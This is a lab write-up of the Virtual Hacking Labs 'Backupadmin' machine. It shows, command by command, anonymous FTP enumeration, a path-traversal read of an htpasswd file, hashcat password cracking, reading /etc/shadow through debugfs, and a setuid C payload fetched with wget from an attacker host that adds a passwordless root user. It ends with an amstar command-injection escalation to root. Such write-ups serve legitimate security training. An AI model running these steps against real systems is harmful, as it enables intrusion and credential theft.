WriteupsVHL — Backupadmin
MiscEasyLinux
VHL — Backupadmin
FTP server with anonymous access exposes backup credentials. Password reuse leads to SSH login and privilege escalation.
February 8, 2025Virtual Hacking Labs
#FTP#Anonymous Login#Password Reuse#SSH
nmap
sh
nmap -sC -sV -T4 -A -Pn -p- --open 10.11.1.4
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-08 13:22 EST
Stats: 0:00:14 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 50.00% done; ETC: 13:23 (0:00:06 remaining)
Stats: 0:00:37 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 83.33% done; ETC: 13:23 (0:00:06 remaining)
Nmap scan report for 10.11.1.4
Host is up (0.022s latency).
Not shown: 65529 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:172.16.1.1
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 1
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 0 0 32540 Jul 13 2022 backupdirs.txt
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 64:77:04:9b:7b:39:02:78:04:19:90:90:32:a9:58:32 (RSA)
| 256 af:2e:70:d5:fd:44:44:f1:e0:13:57:c1:81:ac:b0:14 (ECDSA)
|_ 256 84:53:0e:f2:39:02:fd:d6:8d:2f:23:c3:7e:f0:d7:7b (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
139/tcp open netbios-ssn Samba smbd 4.6.2
445/tcp open netbios-ssn Samba smbd 4.6.2
10080/tcp open amanda?
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=2/8%OT=21%CT=1%CU=42193%PV=Y%DS=2%DC=I%G=Y%TM=67A7A
OS:141%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=10A%TI=Z%II=I%TS=A)SEQ(SP
OS:=106%GCD=1%ISR=10A%TI=Z%II=I%TS=A)SEQ(SP=106%GCD=1%ISR=10B%TI=Z%II=I%TS=
OS:A)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O5=M5
OS:B4ST11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE8
OS:8)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S
OS:+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=N)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O
OS:=%RD=0%Q=)T6(R=N)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK
OS:=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
Network Distance: 2 hops
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_nbstat: NetBIOS name: BACKUPADMIN, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
|_clock-skew: -1m30s
| smb2-time:
| date: 2025-02-08T18:22:30
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
TRACEROUTE
HOP RTT ADDRESS
1 21.83 ms 10.11.1.421
sh
21/tcp open ftp vsftpd 3.0.3
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:172.16.1.1
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 1
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 0 0 32540 Jul 13 2022 backupdirs.txtsh
ftp anonymous@10.11.1.4sh
ftp> ls ../
229 Entering Extended Passive Mode (|||50853|)
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 32540 Jul 13 2022 backupdirs.txt
226 Directory send OK.
ftp> get backupdirs.txt
80
sh
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).445
sh
445/tcp open netbios-ssn Samba smbd 4.6.2sh
smbclient -N -L \\\\10.11.1.4
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
share Disk Uploads
IPC$ IPC IPC Service (backupadmin server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.
smbXcli_negprot_smb1_done: No compatible protocol selected by server.
Protocol negotiation to server 10.11.1.4 (for a protocol between LANMAN1 and NT1) failed: NT_STATUS_INVALID_NETWORK_RESPONSE
Unable to connect with SMB1 -- no workgroup availablePHP File Vault 0.9 - Directory Traversal LFI
- https://www.exploit-db.com/exploits/40163
- since the site is running
nginx
txt
./nginx:
conf.d
fastcgi.conf
fastcgi_params
htpasswd
koi-utf
koi-win
mime.types
modules-available
modules-enabled
nginx.conf
proxy_params
scgi_params
sites-available
sites-enabled
snippets
uwsgi_params
win-utfsh
http://10.11.1.4/fileinfo.php?sha1=../../../../etc/nginx/htpasswd
hashcat
sh
hashcat -m 1600 '$apr1$tMyA9cpu$yp0B748Epfcv/No74ohd/0' /usr/share/wordlists/rockyou.txt
$apr1$tMyA9cpu$yp0B748Epfcv/No74ohd/0:0811783909 
ssh as backupuser
sh
ssh backupuser@10.11.1.4
password: 0811783909
disk group
sh
backupuser@backupadmin:~$ id
uid=1002(backupuser) gid=34(backup) groups=34(backup),6(disk),26(tape)sh
backupuser@backupadmin:~$ df -h
Filesystem Size Used Avail Use% Mounted on
udev 933M 0 933M 0% /dev
tmpfs 196M 2.4M 193M 2% /run
/dev/mapper/ubuntu--vg-ubuntu--lv 9.8G 4.2G 5.1G 46% /
tmpfs 977M 0 977M 0% /dev/shm
tmpfs 5.0M 0 5.0M 0% /run/lock
tmpfs 977M 0 977M 0% /sys/fs/cgroup
/dev/sda2 1.5G 106M 1.3G 8% /boot
tmpfs 196M 0 196M 0% /run/user/1002sh
backupuser@backupadmin:~$ debugfs /dev/mapper/ubuntu--vg-ubuntu--lv
debugfs 1.45.5 (07-Jan-2020)
debugfs: mkdir test
debugfs: cat /etc/shadow
backupadmin:$6$owIlrXnDzKDc5AtY$CG6JqxlEvmACPZ4Iok14YHeKXBxBAXXGVmsWiLg/G2aTsgwnXNgxJgG13v0mvlTAHnqjssfjzkP32gdvHszil.:19186:0:99999:7:::
lxd:!:19186::::::
ftp:*:19186:0:99999:7:::
postfix:*:19186:0:99999:7:::
amandabackup:!:19186:0:99999:7:::
backupuser:$6$db5M6MoSF5w2SPDM$kuFNNPhZ.l6MdV.gu5R1Y0XudNpM1oy.epFRdz1qzWRobAA1NZXKcu08QIwicvwneBTwMIgpemQqPmEbe7w6C/:19186:0:99999:7:::sh
$6$owIlrXnDzKDc5AtY$CG6JqxlEvmACPZ4Iok14YHeKXBxBAXXGVmsWiLg/G2aTsgwnXNgxJgG13v0mvlTAHnqjssfjzkP32gdvHszil.- write to
.sshand addauthorized_keys
sh
backupuser@backupadmin:~$ nano authorized_keys
backupuser@backupadmin:~$ ls
authorized_keys linpeas.sh pspy64
backupuser@backupadmin:~$ pwd
/home/backupuser- might not be the path for root but can read sensitive files
SUID
sh
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
strings Not Found
-rwsr-xr-- 1 root disk 11K Feb 21 2012 /usr/libexec/amanda/runtar (Unknown SUID binary!)
-rwsr-xr-- 1 root disk 75K Feb 21 2012 /usr/libexec/amanda/planner (Unknown SUID binary!)
-rwsr-xr-- 1 root disk 11K Feb 21 2012 /usr/libexec/amanda/killpgrp (Unknown SUID binary!)
-rwsr-xr-- 1 root disk 11K Feb 21 2012 /usr/libexec/amanda/rundump (Unknown SUID binary!)
-rwsr-xr-- 1 root disk 56K Feb 21 2012 /usr/libexec/amanda/dumper (Unknown SUID binary!)
-rwsr-xr-- 1 root disk 45K Feb 21 2012 /usr/libexec/amanda/application/amgtar (Unknown SUID binary!)
-rwsr-xr-- 1 root disk 36K Feb 21 2012 /usr/libexec/amanda/application/amstar (Unknown SUID binary!)
-rwsr-xr-- 1 root disk 19K Feb 21 2012 /usr/libexec/amanda/calcsize (Unknown SUID binary!)
-rwsr-xr-x 1 root root 31K Feb 21 2022 /usr/bin/pkexec ---> Linux4.10_to_5.1.17(CVE-2019-13272)/rhel_6(CVE-2011-1485)
-rwsr-xr-x 1 root root 39K Feb 7 2022 /usr/bin/umount ---> BSD/Linux(08-1996)
-rwsr-xr-x 1 root root 87K Jul 14 2021 /usr/bin/gpasswd
-rwsr-sr-x 1 daemon daemon 55K Nov 12 2018 /usr/bin/at ---> RTru64_UNIX_4.0g(CVE-2002-1614)
-rwsr-xr-x 1 root root 52K Jul 14 2021 /usr/bin/chsh
-rwsr-xr-x 1 root root 67K Jul 14 2021 /usr/bin/passwd ---> Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-xr-x 1 root root 44K Jul 14 2021 /usr/bin/newgrp ---> HP-UX_10.20
-rwsr-xr-x 1 root root 163K Jan 19 2021 /usr/bin/sudo ---> check_if_the_sudo_version_is_vulnerable
-rwsr-xr-x 1 root root 84K Jul 14 2021 /usr/bin/chfn ---> SuSE_9.3/10
-rwsr-xr-x 1 root root 67K Feb 7 2022 /usr/bin/su
-rwsr-xr-x 1 root root 39K Mar 7 2020 /usr/bin/fusermount
-rwsr-xr-x 1 root root 55K Feb 7 2022 /usr/bin/mount ---> Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-- 1 root disk 68K Feb 21 2012 /usr/sbin/amcheck (Unknown SUID binary!)
-rwsr-xr-- 1 root disk 15K Feb 21 2012 /usr/sbin/amservice (Unknown SUID binary!)
-rwsr-xr-x 1 root root 15K Jul 8 2019 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-- 1 root messagebus 51K Apr 29 2022 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 23K Feb 21 2022 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-x 1 root root 463K Mar 30 2022 /usr/lib/openssh/ssh-keysign
amanda privilege escalation
- https://www.exploit-db.com/exploits/39217
code
backupuser@backupadmin:/var/lib$ ls -al /usr/libexec/amanda/runtar
-rwsr-xr-- 1 root disk 10448 Feb 21 2012 /usr/libexec/amanda/runtar
x.c
c
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>
int main(){
setreuid(0,0);
setregid(0,0);
system("echo r00t::0:0::/:/bin/sh >> /etc/passwd");
exit(0);
}sh
backupuser@backupadmin:~$ wget http://172.16.1.3/x.csh
docker run --rm -v "$PWD":/usr/src/myapp -w /usr/src/myapp gcc:4.8 gcc -o x x.csh
backupuser@backupadmin:~$ wget http://172.16.1.3/xsh
backupuser@backupadmin:~$ chmod +x xAmanda 3.3.1 - 'amstar' Command Injection Privilege Escalation
- https://www.exploit-db.com/exploits/39244
txt
$ id
uid=34(backup) gid=34(backup) groups=34(backup),6(disk),26(tape)
$ cat /tmp/runme.sh
#!/bin/sh
/bin/sh
$ ls -al /usr/lib/amanda/application/amstar
-rwsr-xr-- 1 root backup 31284 Jul 29 2012 /usr/lib/amanda/application/amstar
$ /usr/lib/amanda/application/amstar restore --star-path=/tmp/runme.sh
# id
uid=0(root) gid=34(backup) groups=0(root),6(disk),26(tape),34(backup)
# uname -a
Linux raspberrypi 3.10.25 #1 Sat Dec 28 20:50:23 EST 2013 armv6l GNU/Linux
#sh
backupuser@backupadmin:/tmp$ nano runme.sh
backupuser@backupadmin:/tmp$ chmod +x runme.shsh
backupuser@backupadmin:/tmp$ /usr/libexec/amanda/application/amstar restore --star-path=/tmp/runme.sh
# whoami
root
# cd /root
# cat key.txt
dhj289mlk832GB30fdsdkey.txt
Up next
EasyFeb 2025
VHL — Web01-Dev
Development web server with FTP credentials leaked via anonymous login. Credential reuse and web shell upload for root.
Read writeup
EasyFeb 2025
VHL — Web01-Prd
Production web server with anonymous FTP access. Weak credentials and misconfigured permissions lead to full compromise.
Read writeup
EasyFeb 2025
VHL — Forum
uftpd FTP server with anonymous access. Forum application vulnerability exploited to obtain a shell and escalate to root.
Read writeup